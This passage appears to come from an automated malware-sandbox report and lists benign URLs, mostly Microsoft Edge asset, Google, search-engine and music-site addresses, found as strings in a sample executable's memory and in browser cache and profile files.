              Source: ffedd3aa-5869-47ed-b24d-bb1c4fcf1e9f.tmp.11.dr, c5f29bf0-b74e-48bc-a110-aca9fb24b53f.tmp.11.drString found in binary or memory: https://assets.msn.com
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://assets.msn.com/resolver/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://bard.google.com/
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://bit.ly/wb-precache
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.000000000331F000.00000004.00000020.00020000.00000000.sdmp, ectjmg.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.000000000331F000.00000004.00000020.00020000.00000000.sdmp, ectjmg.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://browser.events.data.msn.cn/
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://browser.events.data.msn.com/
              Source: Reporting and NEL.11.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://c.msn.com/
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: offscreendocument_main.js.10.dr, service_worker_bin_prod.js.10.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563696536.0000000003732000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mgd2v3.0.dr, Web Data.10.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563696536.0000000003732000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mgd2v3.0.dr, Web Data.10.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: manifest.json0.10.drString found in binary or memory: https://chrome.google.com/webstore/
              Source: manifest.json0.10.drString found in binary or memory: https://chromewebstore.google.com/
              Source: ffedd3aa-5869-47ed-b24d-bb1c4fcf1e9f.tmp.11.dr, c5f29bf0-b74e-48bc-a110-aca9fb24b53f.tmp.11.drString found in binary or memory: https://clients2.google.com
              Source: manifest.json.10.drString found in binary or memory: https://clients2.google.com/service/update2/crx
              Source: ffedd3aa-5869-47ed-b24d-bb1c4fcf1e9f.tmp.11.dr, c5f29bf0-b74e-48bc-a110-aca9fb24b53f.tmp.11.drString found in binary or memory: https://clients2.googleusercontent.com
              Source: chromecache_516.5.drString found in binary or memory: https://clients6.google.com
              Source: chromecache_516.5.drString found in binary or memory: https://content.googleapis.com
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.000000000331F000.00000004.00000020.00020000.00000000.sdmp, ectjmg.0.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.000000000331F000.00000004.00000020.00020000.00000000.sdmp, ectjmg.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: Reporting and NEL.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: manifest.json.10.drString found in binary or memory: https://docs.google.com/
              Source: chromecache_516.5.drString found in binary or memory: https://domains.google.com/suggest/flow
              Source: manifest.json.10.drString found in binary or memory: https://drive-autopush.corp.google.com/
              Source: manifest.json.10.drString found in binary or memory: https://drive-daily-0.corp.google.com/
              Source: manifest.json.10.drString found in binary or memory: https://drive-daily-1.corp.google.com/
              Source: manifest.json.10.drString found in binary or memory: https://drive-daily-2.corp.google.com/
              Source: manifest.json.10.drString found in binary or memory: https://drive-daily-3.corp.google.com/
              Source: manifest.json.10.drString found in binary or memory: https://drive-daily-4.corp.google.com/
              Source: manifest.json.10.drString found in binary or memory: https://drive-daily-5.corp.google.com/
              Source: manifest.json.10.drString found in binary or memory: https://drive-daily-6.corp.google.com/
              Source: manifest.json.10.drString found in binary or memory: https://drive-preprod.corp.google.com/
              Source: manifest.json.10.drString found in binary or memory: https://drive-staging.corp.google.com/
              Source: manifest.json.10.drString found in binary or memory: https://drive.google.com/
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563696536.0000000003732000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mgd2v3.0.dr, Web Data.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563696536.0000000003732000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mgd2v3.0.dr, Web Data.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563696536.0000000003732000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mgd2v3.0.dr, Web Data.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 000003.log10.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
              Source: 000003.log10.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
              Source: 000003.log9.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
              Source: HubApps Icons.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
              Source: HubApps Icons.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.dr, HubApps Icons.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
              Source: HubApps Icons.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
              Source: 000003.log10.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.dr, HubApps Icons.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
              Source: HubApps Icons.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
              Source: HubApps Icons.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
              Source: HubApps Icons.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
              Source: chromecache_519.5.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
              Source: chromecache_519.5.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
              Source: chromecache_519.5.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
              Source: chromecache_519.5.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://gaana.com/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
              Source: ectjmg.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://m.kugou.com/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://m.soundcloud.com/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://m.vk.com/
